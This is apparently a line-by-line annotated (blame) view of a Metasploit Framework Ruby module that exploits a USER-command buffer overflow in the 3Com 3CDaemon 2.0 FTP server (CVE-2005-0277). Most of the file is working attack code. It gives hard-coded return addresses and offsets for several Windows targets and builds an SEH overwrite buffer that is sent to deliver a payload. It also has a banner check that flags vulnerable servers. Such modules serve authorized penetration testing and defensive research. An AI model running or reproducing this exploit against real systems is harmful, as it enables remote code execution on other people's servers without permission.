root / modules / exploits / windows / ftp / 3cdaemon_ftp_user.rb @ master
History | View | Annotate | Download (3.1 kB)
| 1 | abbeb2e8 | HD Moore | ##
|
|---|---|---|---|
| 2 | d42194e1 | Matt Miller | # $Id$
|
| 3 | abbeb2e8 | HD Moore | ##
|
| 4 | abbeb2e8 | HD Moore | |
| 5 | abbeb2e8 | HD Moore | ##
|
| 6 | 0ea6eca4 | Joshua Drake | # This file is part of the Metasploit Framework and may be subject to
|
| 7 | abbeb2e8 | HD Moore | # redistribution and commercial restrictions. Please see the Metasploit
|
| 8 | 30a3d8bb | Oliver-Tobias Ripka | # Framework web site for more information on licensing and terms of use.
|
| 9 | 20f0a58c | sinn3r | # http://metasploit.com/framework/
|
| 10 | abbeb2e8 | HD Moore | ##
|
| 11 | abbeb2e8 | HD Moore | |
| 12 | fb8b56f5 | HD Moore | require 'msf/core'
|
| 13 | 973e7d16 | HD Moore | |
| 14 | fd256ec4 | HD Moore | class Metasploit3 < Msf::Exploit::Remote |
| 15 | ff83f1cd | Joshua Drake | Rank = AverageRanking |
| 16 | 973e7d16 | HD Moore | |
| 17 | fd256ec4 | HD Moore | include Msf::Exploit::Remote::Ftp |
| 18 | fd256ec4 | HD Moore | include Msf::Exploit::Remote::Seh |
| 19 | 973e7d16 | HD Moore | |
| 20 | 973e7d16 | HD Moore | def initialize(info = {}) |
| 21 | 0ea6eca4 | Joshua Drake | super(update_info(info,
|
| 22 | 4d76fb86 | HD Moore | 'Name' => '3Com 3CDaemon 2.0 FTP Username Overflow', |
| 23 | 973e7d16 | HD Moore | 'Description' => %q{ |
| 24 | 0ea6eca4 | Joshua Drake | This module exploits a vulnerability in the 3Com 3CDaemon |
| 25 | 973e7d16 | HD Moore | FTP service. This package is being distributed from the 3Com |
| 26 | 973e7d16 | HD Moore | web site and is recommended in numerous support documents. |
| 27 | 973e7d16 | HD Moore | This module uses the USER command to trigger the overflow. |
| 28 | 973e7d16 | HD Moore | },
|
| 29 | 30a3d8bb | Oliver-Tobias Ripka | 'Author' =>
|
| 30 | 20f0a58c | sinn3r | [ |
| 31 | 30a3d8bb | Oliver-Tobias Ripka | 'hdm', # Original author |
| 32 | 30a3d8bb | Oliver-Tobias Ripka | 'otr' # Windows XP SP3 |
| 33 | 20f0a58c | sinn3r | ], |
| 34 | 1bffccf6 | HD Moore | 'License' => MSF_LICENSE, |
| 35 | 973e7d16 | HD Moore | 'Version' => '$Revision$', |
| 36 | 973e7d16 | HD Moore | 'References' =>
|
| 37 | 973e7d16 | HD Moore | [ |
| 38 | 0ab728c6 | HD Moore | [ 'CVE', '2005-0277'], |
| 39 | 973e7d16 | HD Moore | [ 'OSVDB', '12810'], |
| 40 | 973e7d16 | HD Moore | [ 'OSVDB', '12811'], |
| 41 | 973e7d16 | HD Moore | [ 'BID', '12155'], |
| 42 | 973e7d16 | HD Moore | [ 'URL', 'ftp://ftp.3com.com/pub/utilbin/win32/3cdv2r10.zip'], |
| 43 | 973e7d16 | HD Moore | ], |
| 44 | 30a3d8bb | Oliver-Tobias Ripka | 'DefaultOptions' =>
|
| 45 | 30a3d8bb | Oliver-Tobias Ripka | {
|
| 46 | 30a3d8bb | Oliver-Tobias Ripka | 'EXITFUNC' => 'seh', |
| 47 | 30a3d8bb | Oliver-Tobias Ripka | 'target' => 0 |
| 48 | 30a3d8bb | Oliver-Tobias Ripka | }, |
| 49 | 973e7d16 | HD Moore | 'Privileged' => false, |
| 50 | 973e7d16 | HD Moore | 'Payload' =>
|
| 51 | 973e7d16 | HD Moore | {
|
| 52 | 32d83b8c | HD Moore | 'Space' => 674, |
| 53 | 32d83b8c | HD Moore | 'BadChars' => "\x00~+&=%\x3a\x22\x0a\x0d\x20\x2f\x5c\x2e\x09", |
| 54 | 973e7d16 | HD Moore | 'StackAdjustment' => -3500, |
| 55 | 973e7d16 | HD Moore | 'Compat' =>
|
| 56 | 973e7d16 | HD Moore | {
|
| 57 | 973e7d16 | HD Moore | 'ConnectionType' => "-find" |
| 58 | 973e7d16 | HD Moore | } |
| 59 | 973e7d16 | HD Moore | }, |
| 60 | 0ea6eca4 | Joshua Drake | 'Targets' =>
|
| 61 | 973e7d16 | HD Moore | [ |
| 62 | 0ea6eca4 | Joshua Drake | [ |
| 63 | 32d83b8c | HD Moore | 'Windows 2000 English', # Tested OK - hdm 11/24/2005 |
| 64 | 973e7d16 | HD Moore | {
|
| 65 | 973e7d16 | HD Moore | 'Platform' => 'win', |
| 66 | 81a1de75 | HD Moore | 'Ret' => 0x75022ac4, # ws2help.dll |
| 67 | 30a3d8bb | Oliver-Tobias Ripka | 'Offset' => 229, |
| 68 | 973e7d16 | HD Moore | }, |
| 69 | def6c64a | HD Moore | ], |
| 70 | def6c64a | HD Moore | [ |
| 71 | 973e7d16 | HD Moore | 'Windows XP English SP0/SP1',
|
| 72 | 973e7d16 | HD Moore | {
|
| 73 | 973e7d16 | HD Moore | 'Platform' => 'win', |
| 74 | 81a1de75 | HD Moore | 'Ret' => 0x71aa32ad, # ws2help.dll |
| 75 | 30a3d8bb | Oliver-Tobias Ripka | 'Offset' => 229, |
| 76 | 973e7d16 | HD Moore | }, |
| 77 | def6c64a | HD Moore | ], |
| 78 | def6c64a | HD Moore | [ |
| 79 | 973e7d16 | HD Moore | 'Windows NT 4.0 SP4/SP5/SP6',
|
| 80 | 973e7d16 | HD Moore | {
|
| 81 | 973e7d16 | HD Moore | 'Platform' => 'win', |
| 82 | 81a1de75 | HD Moore | 'Ret' => 0x77681799, # ws2help.dll |
| 83 | 30a3d8bb | Oliver-Tobias Ripka | 'Offset' => 229, |
| 84 | 0ea6eca4 | Joshua Drake | }, |
| 85 | 973e7d16 | HD Moore | ], |
| 86 | 0ea6eca4 | Joshua Drake | [ |
| 87 | 45908448 | Joshua Drake | 'Windows 2000 Pro SP4 French',
|
| 88 | 45908448 | Joshua Drake | {
|
| 89 | 45908448 | Joshua Drake | 'Platform' => 'win', |
| 90 | 45908448 | Joshua Drake | 'Ret' => 0x775F29D0, |
| 91 | 30a3d8bb | Oliver-Tobias Ripka | 'Offset' => 229, |
| 92 | 30a3d8bb | Oliver-Tobias Ripka | }, |
| 93 | 30a3d8bb | Oliver-Tobias Ripka | ], |
| 94 | 30a3d8bb | Oliver-Tobias Ripka | [ |
| 95 | 30a3d8bb | Oliver-Tobias Ripka | 'Windows XP English SP3',
|
| 96 | 30a3d8bb | Oliver-Tobias Ripka | {
|
| 97 | 30a3d8bb | Oliver-Tobias Ripka | 'Platform' => 'win', |
| 98 | 30a3d8bb | Oliver-Tobias Ripka | 'Ret' => 0x7CBD41FB, # 7CBD41FB JMP ESP shell32.data SP3 |
| 99 | 30a3d8bb | Oliver-Tobias Ripka | #'Ret' => 0x775C2C1F, # 775C2C1F JMP ESP shell32.data SP1
|
| 100 | 30a3d8bb | Oliver-Tobias Ripka | 'Offset' => 245, |
| 101 | 45908448 | Joshua Drake | }, |
| 102 | 2d5be3df | fab | ], |
| 103 | 973e7d16 | HD Moore | ], |
| 104 | 973e7d16 | HD Moore | 'DisclosureDate' => 'Jan 4 2005')) |
| 105 | 973e7d16 | HD Moore | end
|
| 106 | 973e7d16 | HD Moore | |
| 107 | 973e7d16 | HD Moore | def check |
| 108 | 973e7d16 | HD Moore | connect |
| 109 | 0ea6eca4 | Joshua Drake | disconnect |
| 110 | 973e7d16 | HD Moore | if (banner =~ /3Com 3CDaemon FTP Server Version 2\.0/) |
| 111 | 973e7d16 | HD Moore | return Exploit::CheckCode::Vulnerable |
| 112 | 0ea6eca4 | Joshua Drake | end
|
| 113 | 32d83b8c | HD Moore | return Exploit::CheckCode::Safe |
| 114 | 973e7d16 | HD Moore | end
|
| 115 | 973e7d16 | HD Moore | |
| 116 | 973e7d16 | HD Moore | def exploit |
| 117 | 973e7d16 | HD Moore | connect |
| 118 | 0ea6eca4 | Joshua Drake | |
| 119 | 973e7d16 | HD Moore | print_status("Trying target #{target.name}...")
|
| 120 | 10a95de4 | HD Moore | |
| 121 | 30a3d8bb | Oliver-Tobias Ripka | if (target == targets[4]) |
| 122 | 30a3d8bb | Oliver-Tobias Ripka | buf = rand_text_english(target['Offset'], payload_badchars)
|
| 123 | 30a3d8bb | Oliver-Tobias Ripka | buf << [ target['Ret'] ].pack('V') * 2 |
| 124 | 30a3d8bb | Oliver-Tobias Ripka | buf << payload.encoded |
| 125 | 30a3d8bb | Oliver-Tobias Ripka | else
|
| 126 | 20f0a58c | sinn3r | buf = rand_text_english(2048, payload_badchars)
|
| 127 | 20f0a58c | sinn3r | seh = generate_seh_payload(target.ret) |
| 128 | 30a3d8bb | Oliver-Tobias Ripka | buf[target['Offset'], seh.length] = seh
|
| 129 | 30a3d8bb | Oliver-Tobias Ripka | end
|
| 130 | 81a1de75 | HD Moore | |
| 131 | 08e3078d | HD Moore | send_cmd( ['USER', buf] , false ) |
| 132 | 0ea6eca4 | Joshua Drake | |
| 133 | 973e7d16 | HD Moore | handler |
| 134 | 3783e27f | HD Moore | disconnect |
| 135 | 973e7d16 | HD Moore | end
|
| 136 | 973e7d16 | HD Moore | |
| 137 | 0ab728c6 | HD Moore | end |